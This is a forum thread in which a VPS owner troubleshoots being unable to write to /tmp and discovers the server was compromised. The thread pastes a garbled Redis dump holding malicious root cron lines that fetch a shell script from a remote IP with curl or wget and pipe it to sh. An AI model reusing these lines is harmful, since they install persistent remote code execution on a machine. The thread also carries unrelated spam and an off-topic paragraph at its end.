Join Log in
Score:2
Stephane avatar Server

Why even my root user cannot write in the /tmp directory?

my flag
Stephane

I cannot write in the /tmp directory.

This as a non root user:

europasprak@vps-xxxxxxxx:~$ echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted

and

europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' | sudo tee /tmp/dummy
tee: /tmp/dummy: Operation not permitted

As well as a root user:

root@vps-xxxxxxxx:~# echo 'ok' > /tmp/dummy
bash: /tmp/dummy: Operation not permitted

It even refuses before(!) asking for the sudo password:

Last login: Wed Aug 18 19:38:33 2021 from 91.168.98.130
europasprak@vps-3506b083:~$ sudo echo 'ok' > /tmp/dummy2
-bash: /tmp/dummy2: Operation not permitted

Interestingly it refuses to set the time, as root, in this command:

root@vps-xxxxxxxx:/home/europasprak# touch /tmp/ok
touch: setting times of '/tmp/ok': No such file or directory

The issue showed up this morning.

The machine is:

europasprak@vps-xxxxxxxx:~$ uname -a
Linux vps-xxxxxxxx 5.8.0-63-generic #71-Ubuntu SMP Tue Jul 13 15:59:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

The partitions:

europasprak@vps-xxxxxxxx:~$ df
Filesystem     1K-blocks     Used Available Use% Mounted on
tmpfs             795424     1072    794352   1% /run
/dev/sda1      162420480 59362024 103042072  37% /
tmpfs            3977116        0   3977116   0% /dev/shm
tmpfs               5120        0      5120   0% /run/lock
tmpfs               4096        0      4096   0% /sys/fs/cgroup
/dev/sda15        106858     8008     98851   8% /boot/efi
overlay        162420480 59362024 103042072  37% /home/europasprak/programs/install/docker/overlay2/2f1f82255bbd13b61ea151363e46880c4902b4b822fca15078fb9a10461111df/merged

europasprak@vps-xxxxxxxx:~$ df -i
Filesystem       Inodes  IUsed    IFree IUse% Mounted on
tmpfs            994279    640   993639    1% /run
/dev/sda1      20643840 523620 20120220    3% /
tmpfs            994279      4   994275    1% /dev/shm
tmpfs            994279      3   994276    1% /run/lock
tmpfs              1024     18     1006    2% /sys/fs/cgroup
/dev/sda15            0      0        0     - /boot/efi

Some more output:

europasprak@vps-xxxxxxxx:~$ ls -ld /tmp
drwxrwxrwt 12 root root 4096 août  18 05:45 /tmp

europasprak@vps-xxxxxxxx:~$ lsattr /tmp
--------------e----- /tmp/dump.rdb
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-timesyncd.service-11J2sh
lsattr: Permission denied While reading flags on /tmp/tmp.40xGrsPHCk
--------------e----- /tmp/exp_lin.so
--------------e----- /tmp/oi_plugins.php
--------------e----- /tmp/backup.db
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-logind.service-ffm01g
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-resolved.service-E7ECGg
--------------e----- /tmp/xm4.tgz
lsattr: Permission denied While reading flags on /tmp/snap.lxd

UPDATE: I tried installing acl but failed obviously:

europasprak@vps-xxxxxxxx:~$ sudo apt install acl
Reading package lists... Error!
E: Unable to mkstemp /tmp/clearsigned.message.VjQNL9 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.
europasprak@vps-xxxxxxxx:~$ sudo apt update
Err:1 http://security.ubuntu.com/ubuntu groovy-security InRelease
  Temporary failure resolving 'security.ubuntu.com'
Err:2 https://download.docker.com/linux/ubuntu groovy InRelease
  Temporary failure resolving 'download.docker.com'
Err:3 http://ppa.launchpad.net/ultradvorka/ppa/ubuntu groovy InRelease
  Temporary failure resolving 'ppa.launchpad.net'
Err:4 http://nova.clouds.archive.ubuntu.com/ubuntu groovy InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:5 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-updates InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:6 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-backports InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Reading package lists... Error!
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-updates/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-backports/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://security.ubuntu.com/ubuntu/dists/groovy-security/InRelease  Temporary failure resolving 'security.ubuntu.com'
W: Failed to fetch https://download.docker.com/linux/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'download.docker.com'
W: Failed to fetch http://ppa.launchpad.net/ultradvorka/ppa/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'ppa.launchpad.net'
W: Some index files failed to download. They have been ignored, or old ones used instead.
E: Unable to mkstemp /tmp/clearsigned.message.cOHaS4 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.

UPDATE: I had also tried to switch off a setting but that did not help:

europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
europasprak@vps-xxxxxxxx:~$ sudo sysctl fs.protected_regular=0  
[sudo] password for europasprak: 
fs.protected_regular = 0
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted

The VPS is a kvm instance:

europasprak@vps-xxxxxxxx:~$ sudo virt-what
kvm

UPDATE:

europasprak@vps-xxxxxxxx:~$ sudo journalctl --boot --priority=4
[sudo] password for europasprak: 
-- Logs begin at Thu 2021-04-01 18:46:32 UTC, end at Sun 2021-08-22 13:54:48 UTC. --
août 20 20:52:46 vps-3506b083 kernel:  #2
août 20 20:52:46 vps-3506b083 kernel:  #3
août 20 20:52:46 vps-3506b083 kernel: acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge.
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: EISA: Cannot allocate resource for mainboard
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 1
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 2
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 3
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 4
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 5
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 6
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 7
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 8
août 20 20:52:46 vps-3506b083 kernel: sd 2:0:0:0: Power-on or device reset occurred
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/plymouth-start.service:17: Unit configured to use KillMode=none. This is unsafe, as it disables>
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/dbus.service:12: Unit configured to use KillMode=none. This is unsafe, as it disables systemd's>
août 20 20:52:46 vps-3506b083 systemd-udevd[413]: Could not set WakeOnLan of ens3 to off: Operation not supported
août 20 20:52:48 vps-3506b083 systemd-networkd[658]: /run/systemd/network/10-netplan-ens3.network: MTUBytes= in [Link] section and UseMTU= in [DHCP] section >
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/crontab
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/zzh
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/dog
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: testvxlan: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vx-001000-z6tjy: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[413]: vethe97279b: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vethe514997: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-networkd[658]: vethe97279b: Failed to wait for the interface to be initialized: No such device
europasprak@vps-3506b083:~$

UPDATE: I can see my /etc/crontab file has been tempered with. My system has been hacked. Strangely enough there doesn't seem to be any mining activity going on. I reckon I need to do a full re-install of the system.

REDIS0006þ^@^@^Gbackup3Ã@Q@X^G


*/4 * ^A^_root curl -fsSL http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh

^@^Gbackup1@F


*/2 * * * * root cd1 -fsSL http://199.19.226.117/b2f628/b.sh | sh

^@^Gbackup4Ã@Q@X^G


*/5 * ^A^_root wd1 -q -O- http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh

^@^Gbackup2@H


*/3 * * * * root wget -q -O- http://199.19.226.117/b2f628/b.sh | sh

ÿWìðr<90><93>^Gæ
1043
1 + 6
tmp
br flag
Simon Richter
Is there something called `/tmp/dummy` that is write protected? Opening a file for writing does not reset the permission bits even if you have the right to do so.
0
Reply
Stephane avatar
my flag
Stephane
No, there is no such file. It's not a sticky bit issue. It occurs even for new non existing files.
0
Reply
jp flag
AlexD
Check `lsattr`, `getfacl`
1
Reply
Michael Hampton avatar
cz flag
Michael Hampton
Check the syslog and `dmesg` for any clues.
1
Reply
Stephane avatar
my flag
Stephane
@AlexD I could not install acl
0
Reply
cn flag
Mircea Vutcovici
Could you add the output of `journalctl --boot --priority=4` ?
0
Reply
Score:0
Alex avatar Server
in flag
Alex

This is standard behaviour in Ubuntu 20.04+ due to new fs.protected_regular Linux kernel parameter. You can try disabling it like this

sudo sysctl fs.protected_regular=0

And see if you can write to /tmp now

If you want to make the fs.protected_regular=0 change permanent, add it to the /usr/lib/sysctl.d/protect-links.conf file.

0 + 3
Stephane avatar
my flag
Stephane
I had tried that before but it did not solve the issue. But welcome to SO :-)
0
Reply
Alex avatar
in flag
Alex
Are you running a full virtualization or a container?
0
Reply
Stephane avatar
my flag
Stephane
The `sudo virt-what` command displayed `kvm`
0
Reply
ธงชาติไทย
Elon Musk
I sit in a Tesla and translated this thread with Ai:

mangohost

Post an answer

Most people don’t grasp that asking a lot of questions unlocks learning and improves interpersonal bonding. In Alison’s studies, for example, though people could accurately recall how many questions had been asked in their conversations, they didn’t intuit the link between questions and liking. Across four studies, in which participants were engaged in conversations themselves or read transcripts of others’ conversations, people tended not to realize that question asking would influence—or had influenced—the level of amity between the conversationalists.